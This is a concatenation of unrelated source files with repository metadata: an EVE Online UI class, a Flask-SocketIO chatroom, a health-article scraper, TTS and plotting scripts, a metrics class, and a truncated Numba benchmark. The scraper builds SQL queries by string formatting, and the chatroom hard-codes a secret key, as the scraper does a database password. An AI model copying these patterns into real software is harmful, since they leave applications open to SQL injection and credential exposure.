#Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\eve\client\script\ui\station\fitting\stanceSlot.py
from carbonui.primitives.container import Container
from eve.client.script.ui.inflight import shipstance
import carbonui.const as uiconst
class StanceSlots(Container):
    """Fitting-window container holding the three ship-stance buttons,
    laid out along an arc of the fitting wheel."""
    def __init__(self, **kw):
        super(StanceSlots, self).__init__(**kw)
    def _GetAngles(self):
        # Three slots, 10 degrees apart, starting at 258.
        return [ 258 - i * 10 for i in xrange(3) ]
    def ApplyAttributes(self, attributes):
        Container.ApplyAttributes(self, attributes)
        self.controller = attributes.controller
        typeID = attributes.typeID
        if typeID is None:
            # Fall back to the fitted ship's type when none was passed.
            typeID = sm.GetService('invCache').GetInventoryFromId(attributes.shipID).GetItem().typeID
        self.shipstances = []
        # Create one 32x32 stance button per arc position.
        for angle in self._GetAngles():
            pos = attributes.angleToPos(angle)
            newPos = (pos[0],
             pos[1],
             32,
             32)
            self.shipstances.append(shipstance.ShipStanceFittingButton(shipID=attributes.shipID, typeID=typeID, parent=self, pos=newPos, align=uiconst.TOPLEFT, controller=self.controller))
    def ShowStances(self, shipID, typeID):
        """Configure each pre-built button from the controller's
        per-stance argument list."""
        btnControllerClass = self.controller.GetStanceBtnControllerClass()
        shipStanceButtonsArgs = btnControllerClass().get_ship_stance_buttons_args(typeID, shipID)
        for idx, kwargs in enumerate(shipStanceButtonsArgs):
            stanceButton = self.shipstances[idx]
            stanceButton.SetAsStance(shipID, typeID, kwargs['stanceID'], kwargs['stance'])
    def GetStanceContainers(self):
        # Accessor for the button list built in ApplyAttributes.
        return self.shipstances
|
[
"[email protected]"
] | |
012fafa0dcf896c1f493c2e14f2bedded9a3e5f2
|
66e8ea568dff28a9c596cf86021cf761ef3c4ec3
|
/blogs/chatroom/views.py
|
1225a438afaa8bb932937ad6e65877866aacbcc1
|
[] |
no_license
|
sharebrain/blog
|
df048df520f7f9a670f452afd57e62ffdcc0679a
|
d60a36f363fa61a86170367df0753654c44706a1
|
refs/heads/master
| 2021-01-23T22:31:31.408058 | 2017-09-10T06:42:21 | 2017-09-10T06:42:21 | 64,218,710 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,374 |
py
|
from . import chartroom
#from ..ext import socketio
from flask_socketio import send, emit, join_room, leave_room, disconnect, SocketIO
from flask_login import current_user
import functools
from flask import Flask, redirect, session, json, flash, url_for, render_template
import datetime
import time
app = Flask('blog')
app.config['SECRET_KEY'] = '123456'
socketio = SocketIO(app)
def excape_text(txt):
    """Escape '<' and '>' in chat text so it cannot inject HTML tags.

    BUG FIX: both replacements previously mapped each character to itself
    (the '&lt;'/'&gt;' entity targets were presumably lost to an
    HTML-unescaping step somewhere), making the function a no-op and
    defeating its XSS purpose.
    """
    return txt.replace('<', '&lt;').replace('>', '&gt;')
def authenticated_only(f):
    """Decorator for Socket.IO handlers: disconnect unauthenticated
    clients instead of running the wrapped handler."""
    @functools.wraps(f)
    def wrapped(*args, **kwargs):
        if not current_user.is_authenticated:
            disconnect()
        else:
            return f(*args, **kwargs)
    return wrapped
@socketio.on('connect')
def join():
    # NOTE(review): flask_socketio's join_room normally takes a room
    # argument; the bare call here looks like it would raise — confirm
    # which room a fresh connection is meant to join.
    join_room()
@socketio.on('disconnect')
def leave():
    # NOTE(review): same concern — leave_room is called with no room.
    leave_room()
@app.route("/confirm/<token>")
def confirm(token):
if current_user.confirmed:
return redirect(url_for("index"))
if current_user.confirm(token):
flash("You have already confirmed your account. Thanks!")
else:
flash("The confirmation link is invalid or has expired.")
return redirect(url_for("index"))
@socketio.on("join_user")
def on_new_user(data):
if current_user.username == data["user_name"]:
join_room(session["room"])
emit("new_user", {"name": data["user_name"]}, room=session["room"])
@socketio.on("leave")
def on_leave_room(data):
leave_room(session["room"])
session["room"] = None
redirect(url_for("index"))
@socketio.on("post_message")
def on_new_message(message):
data = {"user": current_user.username,
"content": excape_text(message["data"]),
"created": datetime.datetime.now().strftime("%a %b %d %H:%M:%S %Y"),
"room_id": session["room"],
"id": rc.incr(app.config["ROOM_CONTENT_INCR_KEY"])
}
emit("new_message", {
"user": current_user.username,
"time": datetime.datetime.now().strftime("%a %b %d %H:%M:%S %Y"),
"data": excape_text(message["data"])
}, room=session["room"])
@app.route("/room/<int:room_id>", methods=["GET", "POST"])
def room(room_id):
room_online_user_channel = app.config["ROOM_ONLINE_USER_CHANNEL"].format(room=room_id)
room_content_channel = app.config["ROOM_CONTENT_CHANNEL"].format(room=room_id)
room_info_key = app.config["ROOM_INFO_KEY"].format(room=room_id)
if session["room"] is not None:
session["room"] = None
session["room"] = str(room_id)
room_content_list = []
return render_template("room.html",
room_id=room_id,
users=room_online_users,
user_name=current_user.username,
messages=room_content_list)
@app.route("/rm_room/<int:room_id>", methods=["GET", "POST"])
def rm_room(room_id):
room_info_key = app.config["ROOM_INFO_KEY"].format(room=room_id)
room_info = json.loads(rc.get(room_info_key))
if room_info["creator"] != current_user.username:
flash("You are not the creator of this room!")
return redirect(url_for("index"))
room_content = app.config["ROOM_CONTENT_CHANNEL"].format(room=room_id)
room_online_user_channel = app.config["ROOM_ONLINE_USER_CHANNEL"].format(room=room_id)
flash("The room "+str(room_id)+" has been deleted.")
return redirect(url_for("index"))
|
[
"1261931128.com"
] |
1261931128.com
|
4a41c906501b7d076c709bb4f4f9350878881eda
|
535564a109a0b4b6f071e60063cd84bef2da8e33
|
/src/tts_pyttsx3.py
|
863ee02e5ee7d2846d8a5d62a93a32dc28e251b9
|
[] |
no_license
|
prijatelj/crowd_noise
|
84887d99737e63306f484ce00755131364a09ad1
|
60616a6dc5e66d6612762955dc345f294fdcd535
|
refs/heads/master
| 2020-03-23T07:03:09.747929 | 2018-07-17T03:38:18 | 2018-07-17T03:38:18 | 141,245,015 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,120 |
py
|
"""
A simple program that generates a mp3 audio file of multiple voices speaking
filler english over one another to simulate the noise from a background crowd of
voices speaking. This is to be able to speak in any language, so that any langauge of crowd background noise may be generated.
:author: Derek S. Prijatelj
"""
import pyttsx3
from gtts import gTTS
engine = pyttsx3.init()
voices = engine.getProperty('voices')
english_voices = [v for v in voices if any('en' in x for x in v.languages)]
def simple_crowd():
    """Demo: speak a test sentence, switching voice partway through."""
    def other_speak(name, location, length):
        # Per-word engine callback: utterance name, char offset, word length.
        print('word', name, location, length)
        if location > 10:
            # Swap to another installed voice once past the 10th character.
            engine.setProperty('voice', voices[8])
    engine.connect('started-word', other_speak)
    engine.say('The quick brown fox jumped over the lazy dog.')
    engine.runAndWait()
def add_say(name, location, length):
    # Word callback that queues an extra phrase partway through speech.
    if location > 10:
        engine.say('Yo, I just added this phrase boyo!')
        engine.runAndWait()
def onEnd(name, completed):
    """Engine 'finished' callback stub.

    BUG FIX: the original ``if not completed:`` had no body, which is a
    SyntaxError; a ``pass`` preserves the intended no-op placeholder.
    """
    if not completed:
        pass
def main():
    """Entry point; the experimental hook below is left disabled.

    BUG FIX: the original body held only a comment — also a SyntaxError.
    """
    #engine.connect('started-word', add_say)
    pass
if __name__ == '__main__':
    main()
|
[
"[email protected]"
] | |
09da3887cf75a54b9d1965126cebae0ddf5f6475
|
6929f9696a8f90b3778d449a199cee8891f3f739
|
/python_core/deligating_to_parent_class_and_slots.py
|
c23b6fab9843575d3946b69e50da5f32471b0dc8
|
[] |
no_license
|
chemplife/Python
|
881d492a4271fb2b423f2dd611eaac53a0efdc34
|
7fdfbf442a915e4f41506503baad4345a52d1e86
|
refs/heads/master
| 2022-12-31T20:00:22.475985 | 2020-10-19T20:14:43 | 2020-10-19T20:14:43 | 305,503,403 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,720 |
py
|
'''
super().method()/attribute
-> To deligate things back to the parent class.
-> Use this only when you have the same named function in the child as well.. Because Python anyways will look uo the heirarchy
if it does not find the method in Child-class.
Eg: class A:
def b():
class B(A):
def c():
return self.b() <- is same as -> return super().b() <- Because 'class B'' does not have 'def b()' of its own.
self: binds the instance of the object to the method anywhere in the herarchy.
** if the 'Parent-Class' has '__init__(seld, name)' method that takes in an argument and the 'Child-Class' does not have a '__init__(self)' defined:
-> 'Child-Class' instance need that argument (name) because it is inheritied from the 'Parent Class'
'''
class Person:
    """Base class for the super() delegation demo: prints which class's
    method ran along with the instance it was bound to."""
    def hello(self):
        print('In Person Class: ', self)
class Student(Person):
    """Overrides ``hello`` then delegates to the parent via super();
    both frames print the same ``self`` address, showing the instance
    binding is unchanged up the hierarchy."""
    def hello(self):
        print('In Student Class: ', self)
        super().hello()
p = Person()
s = Student()
p.hello()
print('\n')
# Looks at the address of 'self'.. it is the same in 'Person Class' as it is for 'Student Class'
s.hello()
print('\n\n-------------------------------- Combined Example: Property/Inheritance/Deligate/Caching --------------------------------')
from math import pi
from numbers import Real
class Circle:
    """A circle with a validated radius and lazily cached area/perimeter."""

    def __init__(self, r):
        # Route construction through the property so validation runs here too.
        self.radius = r
        self._area = None
        self._perimeter = None

    @property
    def radius(self):
        """The circle's radius (a positive real number)."""
        return self._r

    @radius.setter
    def radius(self, r):
        # Guard clause: reject anything that is not a positive real.
        if not isinstance(r, Real) or r <= 0:
            raise ValueError('Radius must be a Positive Real Number.')
        self._r = r
        # Invalidate cached derived values; they are recomputed on demand.
        self._area = None
        self._perimeter = None

    @property
    def area(self):
        """Area, computed once per radius change and then served from cache."""
        if self._area is None:
            self._area = pi * self.radius ** 2
        return self._area

    @property
    def perimeter(self):
        """Perimeter, computed once per radius change, then cached."""
        if self._perimeter is None:
            self._perimeter = 2 * pi * self.radius
        return self._perimeter
class UnitCircle(Circle):
    # A circle fixed (initially) at radius 1.  It inherits Circle's setter,
    # so the radius can still be reassigned -- the "problem" shown below.
    def __init__(self):
        super().__init__(1)
u = UnitCircle()
print('UnitCircle Radius:', u.radius)
print('UnitCircle Area:', u.area)
print('UnitCircle Perimeter:', u.perimeter)
#But this will work..
u.radius = 10
print('\nProblem: UnitCircle Radius:', u.radius)
# To make the Radius for Unit-Circle read-only..
class UnitCircle_1(Circle):
    """Unit circle whose radius is intended to be read-only.

    Instantiation still fails (by design of this example) because
    Circle.__init__ assigns via ``self.radius = r`` and this subclass's
    property defines no setter.
    """

    def __init__(self):
        super().__init__(1)

    @property
    def radius(self):
        # BUG FIX: the original body was `return self.radius`, which
        # re-enters this very property and recurses until RecursionError.
        # Delegate the read to the parent's getter instead (as the
        # original inline comment itself suggested).
        return super().radius
# Now it will not work... even without setting u1.radius=10.. Because now, the 'self.radius' in 'circle.__init__()' does not take any argument.
# ** we cannot call the 'radius.setter' from outside of the class.
# u1 = UnitCircle_1()
# u1.radius = 10
# print('\nProblem: UnitCircle_1 Radius:', u1.radius)
# To fix, this, we need to make the 'self.radius' in 'circle.__init__()' call a method to set radius..
# Second version of Circle: the validation lives in a plain helper method
# so that __init__ no longer goes through the property setter.  Subclasses
# may then redefine `radius` as read-only without breaking construction.
class Circle:
    def __init__(self, r):
        # Validate + store via the helper, bypassing the property protocol.
        self._set_radius(r)
        self._area = None
        self._perimeter = None

    @property
    def radius(self):
        """Current radius (positive real number)."""
        return self._r

    def _set_radius(self, r):
        # Shared validation used by both __init__ and the public setter.
        if isinstance(r, Real) and r > 0:
            self._r = r
            self._area = None
            self._perimeter = None
        else:
            raise ValueError('Radius must be a Positive Real Number.')

    @radius.setter
    def radius(self, r):
        self._set_radius(r)

    @property
    def area(self):
        # Lazily computed; cache is invalidated whenever the radius changes.
        if self._area is None:
            self._area = pi * self.radius **2
        return self._area

    @property
    def perimeter(self):
        # Lazily computed; cache is invalidated whenever the radius changes.
        if self._perimeter is None:
            self._perimeter = 2 * pi * self.radius
        return self._perimeter
class UnitCircle_1(Circle):
    # Fixed version: construction works because Circle.__init__ now calls
    # _set_radius() directly, and since this subclass's property has no
    # setter, `radius` is effectively read-only from the outside.
    def __init__(self):
        super().__init__(1)

    @property
    def radius(self):
        # Delegate the read to Circle's property getter.
        return super().radius
u = UnitCircle_1()
print('\n')
print('UnitCircle Radius:', u.radius)
print('UnitCircle Area:', u.area)
print('UnitCircle Perimeter:', u.perimeter)
#Now this will not work..
# u.radius = 10
# print('\nProblem: UnitCircle Radius:', u.radius)
print('\n\n------------------------------------------- Slots -------------------------------------------\n')
'''
Class inherently use 'DICTIONARY' to store all the attributes.
But when we have a lot of instances of the class.. it will create a lot of memory-overhead..
To do it in a better 'memory-efficient-way'.. SLOTS are used
Slots- more compact datastructe that Python.
We need to tell slots what all attributes we will have in advance.
__slots__ = ('x', 'y')
('x', 'y') -> Iterable..
__slots__ -> tells Python that don't use dictionary.. use slots..
Now, Both of these will give error
-> obj.__dict__ : Attribute Error
-> vars(obj) : Tyoe Error
But -> dir(obj) : will tell us about 'x' and 'y'
Slots V/S Dict
-> Slots are 'Memory-Effecient' : Save 10 times the memory compared to Dict.
-> Slots are 'Time-Effecient' : Runs 30% faster then Dict.
-> Slots: Cannot add attributes (Monkey-Patching) during the program.. Dict, we can add attributes on the fly..
'''
class Location:
    """A named geographic point stored via __slots__ (no instance __dict__)."""

    # Declaring __slots__ means instances carry no per-object __dict__;
    # only these three attributes can ever be assigned on an instance.
    __slots__ = ('name', '_longitude', '_latitude')

    def __init__(self, name, *, longitude, latitude):
        self.name = name
        self._longitude = longitude
        self._latitude = latitude

    @property
    def longitude(self):
        """Read-only longitude (no setter is defined)."""
        return self._longitude

    @property
    def latitude(self):
        """Read-only latitude (no setter is defined)."""
        return self._latitude
print('Location Dict: ', Location.__dict__)
Location.map_service = 'Google Maps'
print('\nLocation Dict after Attribute Addition: ', Location.__dict__)
#But we don't have Instance-Dictionary
l = Location('Delhi', longitude=100, latitude=72)
# print('\nLocation Instance Dict: ', l.__dict__)
print('\n\n--------------------------- Slots with Single Inheritance ---------------------------\n')
'''
-> 'Child-Class' will use the 'slots' FROM 'Parent-Class' if present. But 'Child-Class' will have its own '__dict__' to store attributes.
-> 'Child-Class' can have 'slots' even if 'Parent-Class' DON'T have it. 'Child-Class' will still have a '__dict__' to store attributes.
-> If Child-Class also needs to have 'Slots', mention those in the 'Child-Class' which are not in 'Parent-Class'.. Don't re-mention attributes.
-> If re-mentioned:
-> In future updates from Python it will break (It is marked to have a 'check-on' in future.)
-> It hides the Parent Attribute and can cause problems.
-> Increase memeory overhead due to re-mentioning..
************************
How to use both 'Slots' and '__dict__'?
-> __slots__ = 'attributes', .. , '__dict__'
-> Now, we can add more attributes during run-time.. (__dict__ is not dropped..)
-> Nowly added attributes will get stored in '__dict__' and not in 'slots'
'''
# Slots with single inheritance: the parent declares __slots__, but the
# child does not, so child instances regain a regular __dict__.
class Person:
    __slots__ = 'name'
# Student inherits the 'name' slot but, having no __slots__ of its own,
# also carries an instance __dict__ for any other attribute.
class Student(Person):
    pass
p = Person()
s = Student()
# 'name' lands in the inherited slot, so it does NOT appear in __dict__.
s.name = 'Alex'
print('Student Instance Dict: ', s.__dict__)
# 'age' is not a slot, so it is stored in the instance __dict__.
s.age = 18
print('\nStudent Instance Dict: ', s.__dict__)
# This will not work
#print('Person Instance Dict: ', p.__dict__)
|
[
"[email protected]"
] | |
97a283627d40ac164381cb4fb0e0cccbad16809d
|
c2f343d4affbb513e96730111ab9e7dfb6719102
|
/health/health_html_handler.py
|
33bfc4fed4d160867640ae9da5029484652ac8fa
|
[] |
no_license
|
hykruntoahead/projectSpider
|
f3cf2a156645ddfd7f677cf4cd1dae7c8c6d7e19
|
b19b93b9f838c865927ac6a7bdb330b6d543505f
|
refs/heads/master
| 2020-06-01T20:49:08.978750 | 2017-09-21T02:46:39 | 2017-09-21T02:46:39 | 94,084,496 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,588 |
py
|
#encoding=utf-8
import pymysql
import urllib2
from bs4 import BeautifulSoup
import time
class healthHandler:
    """Python 2 scraper: fetches article pages listed in MySQL table
    `health_detail`, saves each as a local HTML file, and records it in
    `health_new_html`."""
    def __init__(self):
        # NOTE(review): backslashes in this Windows path are not escaped;
        # '\h' happens to be no escape sequence, so it works by luck.
        self.base_path='E:\health_new_html'
        self.user_agent = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'
        self.headers = {'User-Agent': self.user_agent}
    def use_databse(self):
        # Open a MySQL connection and select the `health` schema.
        # NOTE(review): credentials are hard-coded; consider a config file.
        conn = pymysql.connect(host='localhost', port=3306, user='root', passwd='123456', charset='UTF8')
        cursor = conn.cursor()
        cursor.execute("USE health")
        return conn, cursor;
    def query_all_item(self,conn,cursor):
        # Load id, type_id and link columns for every row of health_detail.
        sql = '''
        select * from health_detail
        '''
        cursor.execute(sql)
        rows=cursor.fetchall()
        list_id=[]
        list_type_id=[]
        list_link=[]
        for row in rows:
            list_id.append(row[0])
            list_type_id.append(row[2])
            list_link.append(row[3])
        return list_id,list_type_id,list_link
    def insert_into_table(self,conn,cursor,title,source,desc,path,type_id,isnull):
        # SECURITY NOTE(review): the SQL statement is built by string
        # formatting (quotes only blanked, not escaped) -- this is
        # injection-prone; parameterised cursor.execute(sql, args) is safer.
        sql ='''
        insert into health_new_html values(null,%s,%s,%s,%s,%d,%d)
        '''%("'"+title.replace("'"," ")+"'","'"+source+"'","'"+desc.replace("'"," ")+"'","'"+path+"'",type_id,isnull)
        cursor.execute(sql)
        conn.commit()
    def parser_html(self,conn,cursor,id,type_id,url):
        # Fetch the page, retrying with progressively longer timeouts.
        # NOTE(review): bare `except:` also swallows KeyboardInterrupt.
        # req = urllib2.Request(url.encode('utf-8'), headers=self.headers)
        try:
            cont = urllib2.urlopen(url,timeout=5).read()
        except:
            try:
                cont = urllib2.urlopen(url,timeout=10).read()
            except:
                try:
                    cont = urllib2.urlopen(url, timeout=20).read()
                except:
                    cont = urllib2.urlopen(url, timeout=30).read()
        try:
            soup = BeautifulSoup(cont,'html.parser',from_encoding='utf-8')
        except:
            soup = BeautifulSoup(cont, 'html.parser', from_encoding='utf-8')
        # Extract title / source / summary / body from the article markup.
        main = soup.find('div',class_='main_left')
        hart_box = main.find('div',class_='border omanbg1 art_box')
        h1=hart_box.find('h1')
        title=h1.get_text().strip()
        hsource=hart_box.find('div',class_='date')
        source =hsource .get_text().strip()
        hsum = main.find('p',class_='summary')
        summary = hsum.get_text().strip()
        hcontent = main.find('div',class_="art_con",id='contentText')
        # Flag articles whose content div is effectively empty.
        isnull = 0
        if(hcontent.get_text().strip()=='div>'):
            isnull = 1
        # Write the extracted pieces into a minimal standalone HTML file.
        path = self.base_path+"\health_new_%d.html"%id
        fout = open(path, 'w')
        fout.write('<!DOCTYPE html>')
        fout.write("<html>")
        fout.write('''
        <head>
            <meta charset="UTF-8">
        </head>
        ''')
        fout.write("<body>")
        fout.write('<div>')
        fout.write(str(h1))
        fout.write(str(hsource))
        fout.write(str(hsum))
        fout.write(str(hcontent))
        fout.write('</div>')
        fout.write("</body>")
        fout.write("</html>")
        fout.close()
        # Record the saved file in the database.
        self.insert_into_table(conn,cursor,title,source,summary,path,type_id,isnull)
        print 'craw id;%d---title:%s---isnull:%d'%(id,title,isnull)
    def start(self):
        # Resume crawling from id 109776 onwards.
        # NOTE(review): assumes ids are 1-based and contiguous
        # (list index id-1) -- verify against the table contents.
        conn,cursor = self.use_databse()
        list_id,list_type_id,list_link = self.query_all_item(conn,cursor)
        for id in list_id:
            if id >109775:
                self.parser_html(conn,cursor,id,list_type_id[id-1],list_link[id-1])
def start(self):
conn,cursor = self.use_databse()
list_id,list_type_id,list_link = self.query_all_item(conn,cursor)
for id in list_id:
if id >109775:
self.parser_html(conn,cursor,id,list_type_id[id-1],list_link[id-1])
spider = healthHandler()
spider.start()
|
[
"[email protected]"
] | |
619b3e46c9ac6ad81397f6fdc1a93e95e079f237
|
cfc8a4c44572eea1e9c45059ea86ce7b47dbc1d6
|
/util.py
|
8b24532fc14d50c62138744a382a3c6d1c680792
|
[] |
no_license
|
wi1k1n/encryptmeallbot
|
b581546d5c14e2098e310a5d2c80da323311e369
|
6f1436d94b0ac1e250730e8e4ee076120f991816
|
refs/heads/master
| 2022-03-27T00:26:07.772725 | 2019-12-30T01:01:23 | 2019-12-30T01:01:23 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 305 |
py
|
def inann(dict, key):
    """Return True when *key* is present in *dict* and maps to a non-None value."""
    # Guard clause on membership; only then is indexing safe.
    if key not in dict:
        return False
    return dict[key] is not None
def ninann(dict, key):
    """Return True when *key* is missing from *dict* or maps to None.

    Logical negation of inann().
    """
    # Idiom fix: `key not in dict` replaces the awkward `not key in dict`.
    return key not in dict or dict[key] is None
|
[
"[email protected]"
] | |
75d414b298db2aa082fc712ad544fc4a0a1c73a5
|
03b5c9f92bfc14e778e91ea5459eeb71d6dbc920
|
/urionlinejudge/1_begginer/p1049.py
|
f675e730bac486f395d7f26ff4c64d2b98ad60d8
|
[] |
no_license
|
vitorTest/dailyExercBckp
|
f45c16ac23daa4843ec21ebd56bb8e8f103b91e5
|
9730d63eeab816d017b055ddbdf0ca173b375667
|
refs/heads/master
| 2021-06-23T12:05:28.236046 | 2020-11-13T01:16:29 | 2020-11-13T01:16:29 | 143,309,859 | 0 | 0 | null | 2020-11-13T01:16:30 | 2018-08-02T15:01:10 |
C++
|
UTF-8
|
Python
| false | false | 451 |
py
|
#!/usr/bin/env python
# URI Online Judge 1049 - animal classification: three category words read
# from stdin index into a nested dictionary that names the animal.
dict_set = {
    'vertebrado': {
        'ave': {'carnivoro': 'aguia', 'onivoro': 'pomba'},
        'mamifero':{'onivoro': 'homem', 'herbivoro': 'vaca'}
    },
    'invertebrado':{
        'inseto': {'hematofago': 'pulga', 'herbivoro': 'lagarta'},
        'anelideo': {'hematofago': 'sanguessuga', 'onivoro': 'minhoca'}
    }
}
# Read the three classification levels, one per line.
classe1 = input()
classe2 = input()
classe3 = input()
# Nested lookup; raises KeyError if any input is not a valid category.
print(dict_set[classe1][classe2][classe3])
|
[
"[email protected]"
] | |
8359bb272673094265dc59a86fd09d4bc0ff155c
|
afcf07b66dae1b2b771b0ebc81159268ed0cd5f8
|
/share/qt/clean_mac_info_plist.py
|
35acc2d45b3ebfe43bbab133e94586e406155951
|
[
"MIT"
] |
permissive
|
USDX/USDX-Coin
|
e20e20b84c187f5850f8ca201d49c5769eb3c108
|
6977d065031598149b1ff51c02c8549eeb77e0b4
|
refs/heads/master
| 2020-04-10T07:34:38.102807 | 2018-12-09T18:30:39 | 2018-12-09T18:30:39 | 160,883,821 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 889 |
py
|
#!/usr/bin/env python
# Jonas Schnelli, 2013
# make sure the USDX-Qt.app contains the right plist (including the right version)
# fix made because of serval bugs in Qt mac deployment (https://bugreports.qt-project.org/browse/QTBUG-21267)
# NOTE: Python 2 script (uses the `print` statement).
from string import Template
from datetime import date
bitcoinDir = "./";
inFile = bitcoinDir+"/share/qt/Info.plist"
outFile = "USDX-Qt.app/Contents/Info.plist"
# Fallback value if no VERSION line is found in the .pro file.
version = "unknown";
fileForGrabbingVersion = bitcoinDir+"bitcoin-qt.pro"
# Scan the qmake project file for a `VERSION = x.y.z` assignment.
for line in open(fileForGrabbingVersion):
    lineArr = line.replace(" ", "").split("=");
    if lineArr[0].startswith("VERSION"):
        version = lineArr[1].replace("\n", "");
# Substitute $VERSION and $YEAR placeholders in the plist template.
# NOTE(review): fIn/fOut are never explicitly closed; a `with` block
# would guarantee the output is flushed before the success message.
fIn = open(inFile, "r")
fileContent = fIn.read()
s = Template(fileContent)
newFileContent = s.substitute(VERSION=version,YEAR=date.today().year)
fOut = open(outFile, "w");
fOut.write(newFileContent);
print "Info.plist fresh created"
|
[
"[email protected]"
] | |
0f9df2409f2f99b65ed93ad09dd48af4b68c6b34
|
14de770dcab530aa23a8811a304499cb7ccc93ed
|
/plot_hashcodes.py
|
36c1cc74d4a728a16bc00acf27439a96ec222c09
|
[] |
no_license
|
gsig123/SpectralHashing
|
4cd788460347421e2c9de514bf7ddf66a534b061
|
d8e47c6575f7b5773e77b8ae2df37c8d36538ffd
|
refs/heads/master
| 2020-03-17T07:05:35.548619 | 2018-05-14T16:36:14 | 2018-05-14T16:36:14 | 133,382,913 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,372 |
py
|
"""
Plot the input data with colors according to their assigned hashcodes,
as well as the principal components.
Only works for 2d data
"""
import argparse
import importlib
import pickle
import matplotlib.pyplot as plt
import numpy as np
from helpers import normalize_data
def to_binary(val, length):
    """Return *val* as a binary string, left-padded with zeros to *length*."""
    digits = bin(val)[2:]  # strip the '0b' prefix
    return digits.rjust(length, '0')
def read_args():
    """Parse and return the command-line arguments for this script."""
    parser = argparse.ArgumentParser()
    # Both the model path and the input-data path are mandatory.
    parser.add_argument("-model", required=1,
                        help="full path to the visualized model")
    parser.add_argument("-input", required=1,
                        help="full path to the input data")
    # Optional compression strategy; defaults to the vanilla implementation.
    parser.add_argument(
        "-compressor",
        default="Compressors.vanilla",
        help="A module containing a compress(data_norm, sh_model, label) function")
    return parser.parse_args()
def main():
    """Create the plot"""
    # Load the trained spectral-hashing model and the raw 2-D input points.
    args = read_args()
    compressor_file = args.compressor
    compressor = importlib.import_module(compressor_file)
    # NOTE(review): the file handle passed to pickle.load is never closed.
    model = pickle.load(open(args.model, 'rb'))
    # NOTE(review): np.float is removed in NumPy >= 1.24; use float instead.
    input_data = np.genfromtxt(args.input, delimiter=' ', dtype=np.float)
    principal_components = model.pc_from_training
    input_data_norm = normalize_data(input_data)
    # compress() returns (_, hash_codes); only the first code column is used.
    _, hash_codes = compressor.compress(input_data_norm, model, model.training_filename)
    # Split depending on assigned hash values
    hash_buckets = [[] for _ in range(0, 2**model.n_bits)]
    for point, hash_val in zip(input_data_norm, hash_codes[:, 0]):
        hash_buckets[hash_val].append(point)
    # Plot differently colored points, depending on hash
    legend_handles = []
    for hash_val, points in enumerate(hash_buckets):
        x_coords = list(map(lambda x: x[0], points))
        y_coords = list(map(lambda x: x[1], points))
        # Label each bucket with its hash value rendered in binary.
        points, = plt.plot(x_coords, y_coords, '.', label=to_binary(hash_val, model.n_bits))
        legend_handles.append(points)
    # Plot principal components
    for principal_component in principal_components:
        # Eigenvectors were flipped during training
        plt.plot([0.5, 0.5+principal_component[1]/2], [0.5, 0.5+principal_component[0]/2], 'r')
    # Show legend outside to the right
    plt.legend(bbox_to_anchor=(1.04, 0.5), loc="center left", handles=legend_handles)
    # Ensure there is enough space for the legend
    plt.subplots_adjust(right=0.8)
    plt.show()
# Guard the entry point so importing this module does not trigger plotting.
if __name__ == '__main__':
    main()
|
[
"[email protected]"
] | |
17a97046bb0fa80ed31b646a4f2626fd6e046550
|
cbe5c3cd7dcf810b5f120a7ec9872ed665a9c5c2
|
/Eval.py
|
d44dab3c5980d0c9a3a57303d8ef4cf0793dacbf
|
[] |
no_license
|
sagarmane123/IMDB-data-analysis
|
590a5af3ff72fad7b6eb9cee3bb84270b3c8d5af
|
d0f83c8dab6bb45f3f0396935c02b0d7eac74edf
|
refs/heads/master
| 2020-03-19T02:05:49.120004 | 2018-05-31T15:03:13 | 2018-05-31T15:03:13 | 135,598,966 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 830 |
py
|
import numpy as np
class Eval:
    """Binary-classification metrics over +1/-1 label vectors."""

    def __init__(self, pred, gold):
        # pred/gold: array-likes of predicted and true labels (+1 / -1).
        self.pred = pred
        self.gold = gold

    def Accuracy(self):
        """Fraction of predictions that match the gold labels."""
        matches = np.equal(self.pred, self.gold)
        return np.sum(matches) / float(len(self.gold))

    def EvalPrecition(self):
        """Precision = TP / (TP + FP).  (Name kept for caller compatibility.)"""
        pred, gold = np.array(self.pred), np.array(self.gold)
        pos_mask = gold == 1
        neg_mask = gold == -1
        true_pos = np.sum(pred[pos_mask] == gold[pos_mask])
        false_pos = np.sum(pred[neg_mask] != gold[neg_mask])
        return true_pos / (true_pos + false_pos)

    def EvalRecall(self):
        """Recall = TP / (TP + FN)."""
        pred, gold = np.array(self.pred), np.array(self.gold)
        pos_mask = gold == 1
        true_pos = np.sum(pred[pos_mask] == gold[pos_mask])
        false_neg = np.sum(pred[pos_mask] != gold[pos_mask])
        return true_pos / (true_pos + false_neg)
|
[
"[email protected]"
] | |
7b24f503677d127cc2602c78837c258a0b4b2004
|
25356a5460a6791ebbfcdae76051e8fcb2d6995f
|
/P002/Python/numba_copyMatrix.py
|
4023125d7edb1912d9d7cd3f34b8735263f5bdd7
|
[] |
no_license
|
Foadsf/LangBench
|
4956d9fb199d05705cb15429973346029c37fe55
|
f772df47d3d5316e4e644ed7985b2c434164835d
|
refs/heads/master
| 2020-04-10T19:10:58.764629 | 2018-12-10T21:44:42 | 2018-12-10T21:44:42 | 161,226,128 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 883 |
py
|
#!/usr/bin/env python
# Benchmark: per-element loop copy vs. NumPy slice copy of a (dim, dim, 3)
# array, both JIT-compiled with Numba.  Python 2 script (print statements).
import sys
# NOTE(review): len(sys.argv) is always >= 1 (argv[0] is the script name),
# so this guard can never fire; `< 2` was almost certainly intended.
if len(sys.argv) < 1:
    print 'Usage:'
    print '    ./copyMatrix.py dim'
    print 'Please specify matrix dimensions'
    sys.exit()
from numpy import *
from time import *
from numba import jit
dim = int(sys.argv[1])
# Copy with loop
#----------------
@jit
def serial_copy(A):
    # Rotate the three channel planes element by element.
    # `dim` is captured from module scope at JIT time.
    for i in range(dim):
        for j in range(dim):
            A[i,j,0] = A[i,j,1]
            A[i,j,2] = A[i,j,0]
            A[i,j,1] = A[i,j,2]
@jit
def vectorized_copy(A):
